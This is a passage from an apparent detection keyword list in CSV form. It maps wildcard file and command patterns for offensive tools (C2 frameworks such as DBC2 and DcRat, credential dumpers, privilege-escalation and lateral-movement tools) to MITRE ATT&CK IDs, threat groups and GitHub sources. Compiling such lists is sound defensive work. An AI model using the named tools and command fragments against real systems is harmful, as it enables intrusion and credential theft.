- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*DarkRCovery.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*DarkWidow-main*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*das add -db dbname masscan *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das add -db dbname rustscan *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das report -hosts 192.168.1.0/24 -oA report2*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das scan -db dbname -ports 22*80*443*445 -show*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dashlane2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*data/ipwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*data/payloads/stager.ps1*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*data/shell/backdoors*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*data/shell/stagers*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*data/wordlist_256.txt*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*data/wordlists*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Data\VulnerableCOM.csv*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*DataSploit*,offensive_tool_keyword,datasploit,Performs OSINT on a domain / email / username / phone and find out information from different sources,T1247 - T1593 - T1271 - T1110 - T1122 - T1123,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/dvopsway/datasploit,1,1,N/A,N/A,3,227,670,2022-12-04T16:02:57Z,2016-05-26T03:34:43Z -*datr=80ZzUfKqDOjwL8pauwqMjHTa*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*DavidXanatos/DiskCryptor*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*DavRelayUp.csproj*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*DavRelayUp.exe*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*DavRelayUp.sln*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*DavRelayUp-master*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*dazzleUP.cna*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.exe*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.sln*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.vcxproj*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.x32.exe*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.x64.exe*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP_Reflective_DLL*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP-master*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*db2_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*db2_default_user.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DBC2.git*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2_agent.cs*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2_agent.exe*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2Loader.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2Loader.exe*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2Loader.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2LoaderWrapperCLR.*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2LoaderWrapperCLR_x64.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2LoaderWrapperCLR_x86.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*DBC2-master.zip*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*dbdbnchagbkhknegmhgikkleoogjcfge*,greyware_tool_keyword,Hideman VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*dbGetNimplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*dccon.exe -encrypt2*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcenum.run*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*dchrastil*,offensive_tool_keyword,Github Username,github user name hosting exploitation tools:hacker. scripting. recon. OSINT. automation,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/dchrastil,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--dc-ip *--check-user-access*,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,0,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*dcipher-cli*,offensive_tool_keyword,dcipher-cli,Crack hashes using online rainbow & lookup table attack services. right from your terminal.,T1110.001 - T1558.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/k4m4/dcipher-cli,1,0,N/A,N/A,3,224,30,2023-01-05T16:13:56Z,2018-04-08T18:21:44Z -*dcomexec -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*dcomexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dcomhijack.cna*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*dcomhijack.py*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*dcomhijack-main*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*DCOMPotato.*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,0,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*DCOMPotato-master*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*DCOMReflection.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*DcRat 1.0.7*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat.7z*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat.zip*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat_png.png*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat-main.zip*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*dcrypt_bartpe.zip*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcrypt_install.iss*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcrypt_setup_*.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcrypt_winpe.zip*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcsync -Domain*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*dcsync.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 